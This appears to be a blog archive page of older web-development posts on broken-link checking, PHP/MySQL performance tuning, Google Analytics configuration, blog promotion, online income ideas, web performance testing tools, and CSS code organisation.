How to check your site regularly and avoid problems

You have almost certainly clicked a link only to land on an annoying error page telling you the target is invalid or no longer exists. Site owners rarely delete pages deliberately, since those pages are indexed by Google and other search engines; more often a technical fault is what makes them return errors. This is why regular site maintenance is so important: it ensures that links, internal and external alike, stay valid and working.

Link types

Normally, web applications contain a vast number of links. These links may go to a resource within the site (internal links) or outside of the current application (external links). In addition, other sites may link to yours (inbound links). First, I concentrate on links within a site and how these may be located and resolved.

Finding broken links

It's virtually impossible to test each of a site's links manually, because the number of pages keeps growing, making it very difficult to browse through them all (very small websites excepted). Thankfully, there are a variety of tools available to automate this process, allowing you to concentrate on fixing the problem links. Basically, these tools crawl a site and verify every link found, with options to define what should be checked, which links to ignore, and more. The following list provides a selection of these tools:

  • Xenu Link Sleuth: My preferred tool. It is fast and free, and it provides great output via a detailed report of the problems encountered. In addition to checking links, it verifies a variety of linked resources, including images, frames, plug-ins, backgrounds, local image maps, style sheets, scripts, and Java applets.
  • LinkAlarm: This commercial service allows you to check the validity of all links within a site or page. It provides a very detailed report that is color-coded to highlight problems, as well as graphs (and everybody loves a good graph).
  • W3C Link Checker: This online web application allows you to validate links within a web application. It dives into a web resource and provides information on invalid links or error messages.

Once a link is identified as a problem, you must decide how to address it.

Fixing broken links

The error message returned when trying to access a web resource can reveal a lot about what may be wrong. The following list describes codes that may be returned when attempting to access a resource via a link:

  • 301: The target resource has been permanently moved. Strictly a redirect rather than an error, but a sign the link should be updated.
  • 302: The target resource has been temporarily moved.
  • 401: An authorization error; the resource may require a log-on for access.
  • 404: The target resource was not found; it no longer exists at that address.
  • 408: The request to access the resource timed out.
  • 500: The most common error and a generic catch-all. It signals there was a problem with the target resource; the platform serving that resource may provide more information.
  • 904: A non-standard code some link checkers report to signal a bad host name in the link.

A tool like Xenu Link Sleuth provides the error code returned for a broken link. A time-out error may mean the link is valid but busy when tested — you can retest manually, but the rest of the errors signal the link should be removed or replaced.

When dealing with internal links in an application, you may examine the target resource to identify what problems may exist within the page source code. An error code of 500 with an internal page usually signals a code error, so the error may be resolved with a code fix. The link will be fixed if the target page is fixed, but you will want to disable or remove the link until the problems with the target resource are addressed.

Unfortunately, there is not much you can do about external links on sites over which you have no control. In these instances, you will need to remove or replace the link to avoid user problems.

Inbound links

The beauty of the web is the ability to link to other sites, and these inbound links from other sites may generate errors as well. They pose a greater threat, because potential users or customers will be quickly turned away when confronted with a broken link on another site. These broken links may be caused by a deleted or renamed page, an old entry in a search index, a bad bookmark, or an incorrect URL.

One way to approach these errors is to set up your web application to gracefully handle the errors outlined earlier. For example, a custom error page may be created for each error, so the custom page is displayed when/if the error occurs. This custom page can contain a user friendly message, as well as valid links within the application. A good example is creating a custom 404 page to circumvent situations where a linked resource no longer exists. The set-up for such pages will depend on the web application platform.
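As an illustration, on an Apache server a custom 404 page takes a single directive in the site configuration or an .htaccess file (the file path here is a placeholder):

ErrorDocument 404 /errors/not-found.html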

Another way to address errors is by implementing redirects that automatically send a user to another site resource when an error comes up. Again, the set-up and usage of redirects depends upon your platform.
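Again assuming Apache, mod_alias makes a simple permanent redirect a one-liner (both URLs are placeholders):

# send visitors of a retired page to its replacement with a 301
Redirect permanent /old-page.html http://www.example.com/new-page.html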

Lastly, you can keep an eye on external sites with broken links through tools like Google Webmaster Tools, which reports crawl errors and shows which sites link to invalid URLs on your site.

Don’t Relax

Pushing a site to production does not give you any time to relax, as regular maintenance must be performed to keep the site up and available. One part of regular maintenance should be link validation to make sure users don’t experience problems while using the application.

Do you or someone within your organisation regularly perform such maintenance on your web applications? If so, what tools or methods do you prefer? Leave a comment and let me hear your opinion. Also, please subscribe to our RSS feed for the latest tips, tricks and examples.

How to survive heavy traffic: a practical approach

Have you ever wondered what would happen if your website or blog reached the front page of a big site like Digg, Yahoo or StumbleUpon? You would receive enormous traffic, and it would surely kill your server if you hadn't optimized it to survive heavy load. There are various ways to speed up a website, but here I focus on practical optimizations that don't need any additional hardware or commercial software.

If you are familiar with hosting, setup and system administration, you can do this yourself; otherwise you will need the help of someone who knows how to handle a server. Beware: if you don't know what you're doing, you could seriously mess up your system.

Cache PHP Output

Every time a request hits your server, PHP has to do a lot of processing: all of your code has to be compiled and executed for every single visit, even though the outcome is identical for visitor 21600 and visitor 21601. So why not save the flat HTML generated for visitor 21600 and serve that to 21601 as well? This relieves your web server and your database server, because less PHP usually means fewer database queries.

You could write such a system yourself, but there's a neat package in PEAR called Cache_Lite that can do this for us. Its benefits:

  • it saves us the time of reinventing the wheel
  • it’s been thoroughly tested
  • it’s easy to implement
  • it’s got some cool features like lifetime, read/write control, etc.

Installing is like taking candy from a baby. On Ubuntu I would:
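Presumably along these lines (assuming PEAR itself isn't installed yet):

sudo apt-get install php-pear
sudo pear install Cache_Lite

And here is a minimal sketch of wrapping a page with Cache_Lite; the cache directory, the lifetime and the render_page() helper are illustrative assumptions:

<?php
require_once 'Cache/Lite.php';

$cache = new Cache_Lite(array(
    'cacheDir' => '/var/www/cache/',   // must be writable by the web server
    'lifeTime' => 600                  // seconds before a cached page expires
));

$pageId = $_SERVER['REQUEST_URI'];     // one cache entry per URL

if ($html = $cache->get($pageId)) {
    echo $html;                        // cache hit: serve the stored HTML
} else {
    ob_start();                        // cache miss: render the page normally
    render_page();                     // hypothetical function that builds the page
    $html = ob_get_clean();
    $cache->save($html, $pageId);      // store it for the next visitor
    echo $html;
}
?>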

Create Turbo Charged Storage

With the PHP caching mechanism in place, we take away a lot of stress from your CPU & RAM, but not from your disk. This can be solved by creating a storage device with your system’s RAM, like this:
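A tmpfs mount does it; the mount point and size here are examples:

mkdir -p /var/www/www.mysite.com/ramdrive
mount -t tmpfs -o size=64m tmpfs /var/www/www.mysite.com/ramdrive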

Now the directory /var/www/www.mysite.com/ramdrive is not located on your disk, but in your system’s memory. And that’s about 30 times faster 🙂 So why not store your PHP cache files in this directory? You could even copy all static files (images, css, js) to this device to minimize disk IO. Two things to remember:

  • All files in your ramdrive are lost on reboot, so create a script to restore files from disk to RAM
  • The ramdrive itself is lost on reboot, but you can add an entry to /etc/fstab to prevent that
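The corresponding /etc/fstab entry, assuming the same mount point and size as above:

tmpfs /var/www/www.mysite.com/ramdrive tmpfs size=64m 0 0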

Cron jobs for heavy processing

Sometimes you might be processing data that consumes lots of resources: many queries, database calls, heavy computation, maintaining counts, and so on. Such tasks should be left to cron jobs; the daemon runs automatically and performs the required action at whatever interval you set.

For example, if you are counting hits per article, you are updating a counter on every request, locking the record with a WHERE clause each time. To avoid that, you can simply use relatively cheap SQL INSERTs into a separate table. A cron job, run automatically by the server every 5 minutes, then processes the gathered data: it counts the hits per article, deletes the raw rows, and updates the grand total in a field of the article table. Accessing the hit count of an article then takes no extra processing time or heavy queries. A sketch follows below.
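In SQL terms (all table and column names are made up for illustration), the per-request work shrinks to one cheap insert, and the cron job folds the raw rows into the totals:

-- on every page view: an append-only insert instead of a locking UPDATE
INSERT INTO article_hits (article_id) VALUES (42);

-- run from cron every 5 minutes: add the raw hits to the grand totals
-- (a production job would snapshot MAX(id) first and bound both statements
--  by it, so hits arriving mid-run aren't deleted uncounted)
UPDATE articles a
JOIN (SELECT article_id, COUNT(*) AS n
      FROM article_hits
      GROUP BY article_id) h ON h.article_id = a.id
SET a.hit_count = a.hit_count + h.n;

DELETE FROM article_hits;

A matching crontab entry could be:

*/5 * * * * mysql mysite < /home/me/aggregate_hits.sql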

Optimize your Database

Use the InnoDB storage engine

If you use MySQL, the default storage engine for tables is MyISAM. That's not ideal for a high-traffic website, because MyISAM uses table-level locking, which means that during an UPDATE nobody can access any other record of the same table. It puts everyone on hold!

InnoDB however, uses Row level locking. Row level locking ensures that during an UPDATE, nobody can access that particular row, until the locking transaction issues a COMMIT.

phpMyAdmin allows you to easily change the table type in the Operations tab. Though it has never caused me any problems, it's wise to first create a backup of the table you're going to ALTER.
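The equivalent plain SQL, for a hypothetical articles table:

ALTER TABLE articles ENGINE=InnoDB;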

Use optimal field types

Wherever you can, make integer fields as small as possible (not by changing the length but by changing the actual integer type). Here's an overview:

What different integer field types can contain:

Field type   Signed min                  Signed max                  Unsigned min   Unsigned max
TINYINT      -128                        127                         0              255
SMALLINT     -32,768                     32,767                      0              65,535
MEDIUMINT    -8,388,608                  8,388,607                   0              16,777,215
INT          -2,147,483,648              2,147,483,647               0              4,294,967,295
BIGINT       -9,223,372,036,854,775,808  9,223,372,036,854,775,807   0              18,446,744,073,709,551,615

So if you don't need negative numbers in a column, always make the field unsigned. That way you can store maximum values with minimum space (bytes). Also make sure foreign keys have matching field types, and place indexes on them. This will greatly speed up queries.
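For instance, a hit counter never goes negative (the column is hypothetical):

ALTER TABLE articles MODIFY hit_count INT UNSIGNED NOT NULL DEFAULT 0;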

In phpMyAdmin there's a link called Propose Table Structure. Take a look sometime; it will try to tell you which fields can be optimized for your specific database layout.

Queries

Never select more fields than strictly necessary. Sometimes when you're lazy you might reach for a SELECT * even though naming just the columns you need would suffice. Normally that's OK, but not when performance is your no.1 priority. A comparison is sketched below.
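For a hypothetical users table:

-- lazy: drags every column over the wire and defeats covering indexes
SELECT * FROM users WHERE id = 123;

-- better: fetch only what the page actually displays
SELECT username, last_login FROM users WHERE id = 123;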

Tweak the MySQL config

Furthermore, there are quite a few things you can do in the my.cnf file, but I'll save that for another article as it's a bit outside this article's scope.

Save some bandwidth

Save some sockets first

Small optimizations make for big bandwidth savings when volumes are high. If traffic is a big issue, or you really need that extra server capacity, you could throw all CSS code into one big .css file, and do the same with the JS code. This will save you some Apache sockets that other visitors can use for their requests. It will also give you better compression ratios, should you choose to use mod_deflate or compress your JavaScript with Dean Edwards' Packer.

I know what you're thinking. No, don't throw all the CSS and JS into the main page. You still really want this separation to:

  1. make use of the visitor’s browser cache. Once they’ve got your CSS, it won’t be downloaded again
  2. not pollute your HTML with that stuff

And now some bandwidth 😉

  • Limit the number of images on your site
  • Compress your images
  • Eliminate unnecessary whitespace or even compress JS with tools available everywhere.
  • Apache can compress the output before it's sent back to the client through mod_deflate. This results in a smaller page being sent over the Internet at the expense of CPU cycles on the web server. For servers that can afford the CPU overhead, this is an excellent way of saving bandwidth; if CPU rather than bandwidth is your bottleneck, turn compression off instead and keep those cycles. A minimal configuration is sketched after this list.
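A minimal mod_deflate setup, assuming Apache 2 with the module enabled, compressing only the text-based content types:

<IfModule mod_deflate.c>
    AddOutputFilterByType DEFLATE text/html text/plain text/css application/x-javascript
</IfModule>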

Store PHP sessions in your database

If you use PHP sessions to keep track of your logged-in users, you may want to have a look at PHP's session_set_save_handler function. With this function you can override PHP's session handling system with your own handlers and store sessions in a database table.

Now a key to success is to make this table's storage engine MEMORY (also known as HEAP). This stores all session information (which should be tiny variables) in the database server's RAM, taking disk IO stress away from your web server. It also lets you share the sessions with multiple web servers in the future, so that if you're logged in on server A, you're also logged in on server B, making it possible to load balance. A sketch of the wiring follows.
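A minimal sketch, assuming a PDO connection and a sessions table; note the VARCHAR column, since the MEMORY engine doesn't support TEXT:

<?php
// Assumed schema:
// CREATE TABLE sessions (id CHAR(32) PRIMARY KEY, data VARCHAR(2048),
//                        expires INT) ENGINE=MEMORY;
$pdo = new PDO('mysql:host=localhost;dbname=mysite', 'dbuser', 'secret');

session_set_save_handler(
    function () { return true; },        // open: nothing to do
    function () { return true; },        // close: nothing to do
    function ($id) use ($pdo) {          // read: fetch unexpired session data
        $q = $pdo->prepare('SELECT data FROM sessions WHERE id = ? AND expires > ?');
        $q->execute(array($id, time()));
        return (string) $q->fetchColumn();
    },
    function ($id, $data) use ($pdo) {   // write: upsert with a fresh expiry
        $q = $pdo->prepare('REPLACE INTO sessions (id, data, expires) VALUES (?, ?, ?)');
        return $q->execute(array($id, $data, time() + 1440));
    },
    function ($id) use ($pdo) {          // destroy: remove one session
        return $pdo->prepare('DELETE FROM sessions WHERE id = ?')->execute(array($id));
    },
    function ($max) use ($pdo) {         // gc: purge expired sessions
        return $pdo->prepare('DELETE FROM sessions WHERE expires < ?')->execute(array(time()));
    }
);
session_start();
?>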

Sessions on tmpfs

If it's too much of a hassle to store sessions in a MEMORY database, storing session files on a ramdisk is also a good option to gain some performance. Just make /var/lib/php5 live in RAM.
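The same tmpfs trick from earlier applies (the size is an example; check the directory's ownership and permissions afterwards, since PHP must be able to write its session files there):

mount -t tmpfs -o size=64m tmpfs /var/lib/php5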

More tips

Some other things to google on if you want even more:

  • eAccelerator
  • memcached
  • tweak the apache config
  • squid
  • turn off apache logging
  • Add ‘noatime’ in /etc/fstab on your web and data drives to prevent disk writes on every read


Are you tweaking your Google Analytics for success?

Ever wondered why your competitors are doing better than you? One reason could be the way they measure their traffic and tweak performance and usability. Google Analytics provides you with the best insight into your website, and using the following tweaks you can analyze, measure and improve your traffic, and with it your success.

When Google released Google Analytics, they gave webmasters near-enterprise-level analytics for free. However, there are a lot of things you need to tinker with in order to get some of the data you need from it. So here's my list of things you really should be doing to get the most out of GA.

  1. Tracking clicks on links. Every time you put a link to anything external or a download on a page, make sure you add onClick="javascript:pageTracker._trackPageview('/link/linkname');". Always know where your visitors went.
  2. Tracking user groups. If you're sending people to a landing page, and you want to know where they go from there, segment them by using onLoad="javascript:pageTracker._setVar('Segment/Subgroup');". This will help you know what different groups are doing, and split-test user behaviour.
  3. Tracking full referred URLs. You’ll often get visits from forums or blogs that append their URLs. That’s not much use to you, so to make sure you know where people actually came from, set up a filter with the following settings:
    • Name: Full Referrers
    • Type: Custom filter – Advanced
    • Field A -> Extract A: Referral > (.*)
    • Field B -> Extract B:
    • Output To -> Constructor: User-defined > $A$1
  4. Exclude internal visits. Add a new filter with the "Exclude all traffic from an IP address" setting. Then add your own IP address, and repeat for any other IPs you don't want included. Make sure you escape any full stops with a backslash, like this: 63\.212\.171\.
  5. Tracking across multiple domains/subdomains. If you’re running a very large site, or a site that spans multiple domains, you’ll need to be able to track visits across those sites. Fortunately, we have a way of doing that. Firstly, we set up the following filter:
    • Name: Full URI
    • Type: Custom filter – Advanced
    • Field A -> Extract A: Hostname > (.*)
    • Field B -> Extract B: Request URI > (.*)
    • Output To -> Constructor: Request URI > /$A1$B1

    Now you’ll see URLs in your content reports that look like this: www.example.com/index.html, help.example.com/more.html and so on. Next, we tweak the analytics code slightly, so it looks like this:
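    Presumably this is the standard ga.js cross-domain setup; it would look something like the following (the UA number is a placeholder):

    <script type="text/javascript">
    var pageTracker = _gat._getTracker("UA-XXXXXXX-X");
    pageTracker._setDomainName("none");    // don't tie the cookies to a single domain
    pageTracker._setAllowLinker(true);     // accept visitor data passed from linked domains
    pageTracker._trackPageview();
    </script>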

    That will make the code work across all our (sub)domains. Finally, whenever you link from one domain to the other, make sure that you stick this piece of code into the link: onclick="pageTracker._link(this.href); return false;". Alternatively, if you're using forms to jump between domains, use this code instead: onSubmit="javascript:pageTracker._linkByPost(this)".

  6. Tracking ecommerce transactions. Yes, Google Analytics has a full ecommerce module built in too. To turn it on, go to the account settings, and change the Ecommerce Website button from No to Yes. Now, on your receipt page, add the following code, with the fields below being filled from the order.
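    The code referred to is presumably the standard ga.js ecommerce calls; a representative version, with placeholder values standing in for the real order fields:

    pageTracker._addTrans(
        "1234",           // order ID (required)
        "My Store",       // affiliation or store name
        "28.28",          // order total (required)
        "1.29",           // tax
        "5.00",           // shipping
        "San Jose",       // city
        "California",     // state or province
        "USA"             // country
    );
    pageTracker._addItem(
        "1234",           // order ID (required, must match the transaction)
        "DD44",           // SKU
        "T-Shirt",        // product name
        "Green Medium",   // category or variation
        "11.99",          // unit price (required)
        "1"               // quantity (required)
    );
    pageTracker._trackTrans();  // send the transaction to Google Analytics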

    The _addItem block (from pageTracker._addItem( to the closing );) is repeated for each extra product in the transaction. And now you've got ecommerce tracking!

  7. Tracking exact keywords for AdWords. The problem with the keyword reports for your paid search campaigns is that they only show the keyword that was triggered, not the exact phrase the person actually typed in. If you want that, you're going to have to create the following two filters…
    • Name: PPC Keywords 1
    • Type: Custom filter – Advanced
    • Field A -> Extract A: Referral > (\?|&)(q|p)=([^&]*)
    • Field B -> Extract B: Campaign Medium > cpc|ppc
    • Output To -> Constructor: Custom Field 1 > $A3

    Field A Required, Field B Required and Override Output Field need to be set to Yes.

    • Name: PPC Keywords 2
    • Type: Custom filter – Advanced
    • Field A -> Extract A: Custom Field 1 > (.*)
    • Field B -> Extract B: Campaign Term > (.*)
    • Output To -> Constructor: Campaign Term > $B1,($A1)

    Again, Field A Required, Field B Required and Override Output Field need to be set to Yes.
    Now when you look in your reports, you'll see the actual keyword the searcher typed in, in brackets next to the keyword that was triggered. Cool, huh?

  8. Making the site overlay tool useful. There's a basic flaw in the way the site overlay works. Unfortunately, it groups all clicks on a URL together, so if you've got two links to the same URL, it'll report the total data for both, rather than for each link individually. To get around this, leave the first link to the URL in question as it is, but add &location=x to the end of each additional link (where x is the number of that link, so the first extra link would be 1, a second would be 2 and so on). Fixed!


10 Things to Kick-Start Your Blog’s Growth

It can often seem as if our blog’s growth is out of our control. We post regularly and try to write the best content we can, but sometimes this doesn’t seem like enough. Our growth might plateau, or even start going backwards.

Thankfully, there are some things that are in your control. In this post, I want to explore ten actions you can take straight away that will grow your blog and send you traffic. Perform one of these tasks each day, or one a week, and you'll breathe new life into your blog.

1. Give something away. These days, most bloggers don’t want to give something away unless they get something in return (a link, or maybe a review). This seems intuitive: why give away time or resources without any clear benefits?

The truth is counter-intuitive. Give without expecting to receive and you’ll receive anyway. I’m not speaking about this hypothetically. On my own blog, I offered free simplicity reviews and post ideas for anyone who asked without asking for anything in return. I still get links from grateful participants to this day. Giving away something useful for free leaves a lasting impression. There’s no better way to get traffic and recommendations — without even asking for them.

2. Get connections to vote for you on social media. Call in a favor by asking other bloggers and social media users you know to vote up your best content. You’d be surprised how willing people are to give you a leg up if you’d only ask — especially if you do something for them in return, or have done so in the past.

3. Run a competition. The best competitions have one of three qualities: a fantastic prize, an unusual prize, or an interesting format. Other bloggers shouldn’t have to endure a sacrifice to participate. Make the requirement something that will benefit both you and the blogger, while also putting them in the running to win something. If you don’t have funds, make the prize something valuable that costs nothing to you: advertising space on your site, or a service utilizing one of your talents.

4. Write a free report. A ten page report (usually a ‘how to’ on a topic within your niche) might take a few hours to write but is something that can promote your blog in the long-term. If it’s good, people will share it around. They’ll attach it to emails and offer it as a download on their own blogs. Make sure to link back to your own blog in the report and your incoming traffic will grow exponentially as the report spreads.

5. Start a meme. Think of an idea for a blog post or a set of questions. Write that post or answer the questions, then tag ten other bloggers you’d like to participate in the meme. If you make your first article instructive, you’ll encourage everyone who participates in the meme to link back to you for the original instructions. If five of those ten bloggers you’ve tagged participate, and they each tag five others (and so on), your meme has the potential to generate dozens (or hundreds) of links back to your blog.

6. Guest-post on a popular blog. A guest-post on a popular blog can bring dozens to hundreds of targeted hits to your site. Don't think you could ever write for a popular blog? Think again. The key thing to remember when pitching to a popular blogger is to keep it short. Don't write the post before your pitch has been accepted. Your email should include your post idea and, if possible, a headline for the piece. Link to your best article to show them the kind of writing you're capable of.

7. Buy a StumbleUpon campaign. My blog has been on the front page of Digg twice, and StumbleUpon is still my biggest single referrer. For $5 you can buy three hundred hits from social media influencers. If your content is good, you can guarantee a few of those visitors will vote up your post and send you even more traffic. If your content is really good, your $5 campaign could snowball into a viral episode, bringing you thousands of visitors. Here's some more information on running a StumbleUpon advertising campaign.

8. Comment on five popular blogs. The posts on your niche’s most popular blogs are often viewed by thousands of people. If you’re one of the first commenters, you could have thousands of eyeballs passing over your comment. Leave an insightful or thought-provoking comment and this may motivate others to investigate you and your blog. Today, try to be one of the first to comment on posts from five different popular blogs — particularly those with active and interesting comment threads. You’re bound to get some quality traffic.

9. Send out links to your best content. We all want links from popular blogs. You know what they say: if you want something, you’ve got to ask. Send a brief email to five other bloggers linking to a great post you’ve written that’s relevant to their audience. Don’t ask for a link directly, just say something like: I thought you or your readership might be interested in this. Not every person will link to you, but keep trying and eventually someone will. I’ve received hundreds of visitors over time from links that I went out and asked for. Learning to be audacious is a necessary step for any successful blogger.

10. Join a forum in your niche. Your forum signature allows you to attach a link to your blog with every post that you write. Write ten posts today and you’ve created ten new links to your site. People do click through these links. When I first launched my blog, I built its initial readership almost exclusively through participating in a niche forum. This method really does work.

10 New Ways to Make Money Online

When you look for new revenue streams, think about what you do well. Whether you're an expert in your field, a talented designer, a programmer, or a producer of content, there are ways to leverage your knowledge, skills and abilities, package them, and provide them for a fee. And don't forget that successful web workers are often pursuing more than one income stream at the same time. You may be able to assemble a career out of numerous smaller activities.

Read our latest list of 10 new ways to make money online after the jump.

1. Team up with Yahoo! to offer custom search services.
Yahoo! recently launched their BOSS API, which lets anyone build their own custom search engine or mashup using their search results. But you may have missed this teaser on their blog: “In the coming months, we’ll be launching a monetization platform for BOSS that will enable Yahoo! to expand its ad network and enable BOSS partners to jointly participate in the compelling economics of search.” The details of that platform aren’t out yet, but if you think you can come up with a compelling niche search offering, now’s the time to stake out your place in the market.

2. Sell freelance support.
Software and solutions like Copilot and Bomgar make it easier than ever to take over someone's computer remotely, whether or not they know anything about how to let you connect. If you're a whiz at solving operating system and application issues, why not sell your expertise to others who are less sure of themselves? At a reasonable hourly rate, you can still offer personal service that's infinitely better than putting up with anonymous, bored workers in a telecenter somewhere.

3. Create and maintain social networks.
While companies, organizations and individuals do see the value of marketing through social networks, many of them are afraid that they'll "waste time" setting them up and maintaining them. Step in as their social network "developer" to determine the right places – MySpace, Facebook, Twitter, et al. – to have accounts to help them achieve their goals. Then set up their pages and manage them on a regular basis. You can also compile reports that measure your clients' online buzz and turn those in along with your monthly invoice.

4. Plan and host virtual events.

If you’re great at organizing, publicizing and managing events, why not offer your services online? Whether a live text chat on a client’s web site or a 3-dimensional avatar-based voice chat in a virtual world such as Second Life, companies and organizations could use your help developing and coordinating these events. You can even approach conferences and offer to create an online version of their event to reach a whole separate audience of people who cannot attend their offline happenings. Throw in some event hosting and moderating a la Oprah, and you’ve got yourself a global gig without having to jump on a plane.

5. Offer remote software demos and training.
So you’ve got a way with software, particularly newfangled Web-based applications. Offer your services as a Web apps trainer and hold online demos – for a fee. You can use GoToMeeting.com, Yugma, and similar services to broadcast your demos from your computer desktop to the computer screens of your audience members. Or approach the developers of these applications, show them you know their product almost better than they do, and offer to provide desktop demos to the media and to their higher dollar business customers.

6. Hold educational teleseminars.
Are you great at web design, online marketing or some other kind of web work, and have you wanted to share your skills on a larger scale while getting paid to do it? If you've got the expertise, bottle it and sell it widely in the form of a live teleseminar where you charge a fee for participation, then archive it in your online store to generate recurring revenues. You can do simple web-based conference call coordination through Rondee or get fancier with simultaneous text chat and online documents with Calliflower.

7. Write part of Google’s encyclopedia.
Anyone can contribute to Google's new Knol project, an encyclopedic collection of knowledge in the tradition of Wikipedia. But unlike Wikipedia, Knol shows some prospect of paying its writers, because you can automatically hook up Google Ads to a Knol entry and get a share of the take. If you're an authority on some subject of interest, maintaining a Knol page could at least help pay for your internet usage.

8. Flip Web Sites.
Forget trying to think of a brand new hot web site to launch. The New York Times recently reported on people who are making a good living by “flipping” existing sites. The idea: find a niche site with good potential but poor execution, and buy it. Invest your own sweat equity in a site redesign and search engine optimization, then turn around and sell it to someone else who actually wants to run the site. Repeat as often as you can.

9. Sell your video footage.
We’ve covered the microstock photography market several times, but did you know that there’s a budding microstock video market too? If you’re a digital video fanatic, turn your high-quality b-roll into bucks using stock imaging sites that also carry video footage like Pond5, iStockPhoto Video and Pixelflow. Set your price, set your terms, and add this new revenue stream to your income.

10. Sell virtual goods.
From fashion to business tools to décor for virtual homes and offices, avid users of virtual worlds are hungry for well-designed virtual goods. There is a learning curve for each proprietary virtual environment, such as There.com, Kaneva, Lively, and Second Life, but where a world has a commerce component that converts to real dollars, a keen eye for design and detail plus the right building skills can generate income from products made of bits and bytes. In Second Life, for example, some of the more successful clothing designers are bringing in thousands of dollars (US) a month selling items of clothing at 75 cents to $1.50 a pop. And if you are truly an artist, your virtual goods could sell for a pretty penny.

15 Tools to Help You Develop Faster Web Pages

Response times, availability, and stability are vital factors to bear in mind when creating and maintaining a web application. If you're concerned about your web pages' speed, or want to make sure you're in tip-top shape before starting or launching a project, here are a few useful, free tools to help you create and sustain high-performance web applications.

I’ve tried to include a wide variety of tools that are easy to use, and have tried to keep them as OS and technology-independent as possible so that everyone can find a tool or two.

1. YSlow for Firebug

YSlow grades a website's performance based on the best practices for high-performance web sites published on the Yahoo! Developer Network. Each rule is given a letter grade (A through F) stating how you rank on certain aspects of front-end performance. It's a simple tool for finding things you can work on, such as reducing the number of HTTP requests a web page makes and compressing external JavaScript and CSS files. A worthwhile read is the Ajax performance analysis post on IBM developerWorks, which outlines practical ways of using YSlow in your web applications.

2. Firebug

Firebug is an essential browser-based web development tool for debugging, testing, and analyzing web pages. It has a powerful set of utilities to help you understand and dissect what's going on. One of the many notable features is the Net (network) tab, where you can inspect HTML, CSS, XHR, and JS components.

3. Fiddler 2

Fiddler 2 is an HTTP debugging proxy that helps you analyze incoming and outgoing traffic. It's highly customizable and has countless reporting and debugging features. Be sure to read the "Fiddler PowerToy – Part 2: HTTP Performance" guide on the MSDN, which discusses functional uses of Fiddler, including how to improve "first-visit" performance (i.e. unprimed cache), analyzing HTTP response headers, creating custom flags for potential performance problems, and more.

4. Cuzillion

Cuzillion is a cool tool to help you see how page components interact with each other. The goal here is to help you quickly check, test, and modify web pages before you finalize the structure. It can give you clues about potential trouble spots or points of improvement. Cuzillion was created by Steve Souders, formerly Chief Performance Yahoo!, a lead engineer behind Yahoo!'s performance best practices and the creator of YSlow.

5. mon.itor.us

mon.itor.us is a free web-based service that gives you a suite of tools for monitoring performance, availability, and traffic statistics. You can track your website's response time and set up alerts for when a service becomes unavailable. You can also set up weekly, automated benchmarks to see whether changes you've made impact speed and performance positively or negatively.

6. IBM Page Detailer

The IBM Page Detailer is a straightforward tool for letting you visualize web components as they’re being downloaded. It latches onto your browser, so all you have to do is navigate to the desired site with the IBM Page Detailer open. Clicking on a web page component opens a window with the relevant details associated with it. Whenever an event occurs (such as a script being executed), the tool opens a window with information about the processes.

7. Httperf

Httperf is an open-source tool for measuring HTTP server performance running on Linux. It’s an effective tool for benchmarking and creating workload simulations to see if you can handle high-level traffic and still maintain stability. You can also use it to figure out the maximum capacity of your server, gradually increasing the number of requests you make to test its threshold.
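A typical benchmarking invocation looks like this (the host, URI and numbers are illustrative):

httperf --server www.example.com --port 80 --uri /index.html --num-conns 1000 --rate 50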

8. Pylot

Pylot is an open-source performance and scalability testing tool. It uses HTTP load tests so that you can plan, benchmark, analyze and tweak performance. Pylot requires that you have Python installed on the server – but you don’t need to know the language, you use XML to create your testing scenarios.

9. PushToTest TestMaker

PushToTest TestMaker is a free, open-source platform for testing scalability and performance of applications. It has an intuitive graphical user interface with visual reporting and analytical tools. It has a Resource Monitor feature to help you see CPU, memory, and network utilization during testing. The reporting features let you generate graphs or export data into a spreadsheet application for record-keeping or further statistics analysis.

10. Wbox HTTP testing tool

Wbox is a simple, free HTTP testing software released under the GPL (v2). It supports Linux, Windows, and MacOS X systems. It works by making sequential requests at desired intervals for stress-testing. It has an HTTP compression command so that you can analyze data about your server’s file compression. If you’ve just set up a virtual domain, Wbox HTTP testing tool also comes with a command for you to test if everything’s in order before deployment.

11. WebLOAD

WebLOAD is an open-source, professional-grade stress/load testing suite for web applications. WebLOAD lets testers write load-testing scripts in JavaScript. It can gather live data for monitoring, recording, and analysis purposes, using client-side data to analyze performance. It's not just a performance tool – it comes with authoring and debugging features built in.

12. DBMonster

DBMonster is an open-source application to help you tune database structures and table indexes, as well as conduct tests to determine performance under high database load. It helps you see how well your database will scale by automatically generating test data. It supports many databases, such as MySQL, PostgreSQL, Oracle, MSSQL and (probably) any database with a JDBC driver.

13. OctaGate SiteTimer

The OctaGate SiteTimer is a simple utility for determining the time it takes to download everything on a web page. It gives you a visualization of the duration of each state during the download process (initial request, connection, start of download, and end of download).

14. Web Page Analyzer

The Web Page Analyzer is an extremely simple, web-based test to help you gain information on web page performance. It gives you data about the total number of HTTP requests, total page weight, your objects’ sizes, and more. It tries to estimate the download time of your web page on different internet connections and it also enumerates each page object for you. At the end, it provides you with an analysis and recommendation of the web page tested – use your own judgment in interpreting the information.

15. Site-Perf.com

Site-Perf.com is a free web-based service that gives you information about your site’s loading speed. With Site-Perf.com’s tool, you get real-time capturing of data. It can help you spot bottlenecks, find page errors, gather server data, and more – all without having to install an application or register for an account.

More Tools and Related Resources

If you have a favorite web performance tool that wasn't on the list, share it in the comments. We'd also like to hear your experiences, tips, suggestions, and the resources you use.

Courtesy: sixrevisions

Improving Code Readability With CSS Styleguides

Once your latest project is finished, you are very likely to forget the structure of the project's layout, with all its numerous classes, color schemes and typesetting. To understand your code years after you've written it, you need sensible code structuring, which can dramatically reduce complexity, improve code management and consequently simplify maintainability. How can you achieve sensible structuring? There are a number of options. For instance, you can make use of comments: there is always some room for useful hints, notes and, well, comments you can consult after the project has been deployed.

Indeed, developers have come up with quite creative ways to use comments and text formatting to improve the maintainability of CSS code. Such techniques are usually combined into CSS styleguides: pieces of CSS code which provide developers with useful insights into the structure of the code and background information related to it.

This article presents 5 coding techniques which can dramatically improve management and simplify maintainability of your code. You can apply them to CSS, but also to any other stylesheet or programming language you are using.

1. Divide and conquer your code

First consider the structure of your layout and identify the most important modules in your CSS code. In most cases it's useful to choose the order of CSS selectors according to the order of the divs and classes in your layout. Before you start coding, group common elements in separate sections and title each group. For instance, you can select Global Styles (body, paragraphs, lists, etc.), Layout, Headings, Text Styles, Navigation, Forms, Comments and Extras.

To clearly separate fragments of code, select appropriate flags or striking comments (the more *-symbols you have in your code, the more striking a heading is). In the stylesheet they will serve as a heading for each group. Before applying a preferred flag to your code, make sure you can immediately recognize single blocks when scanning through the code.

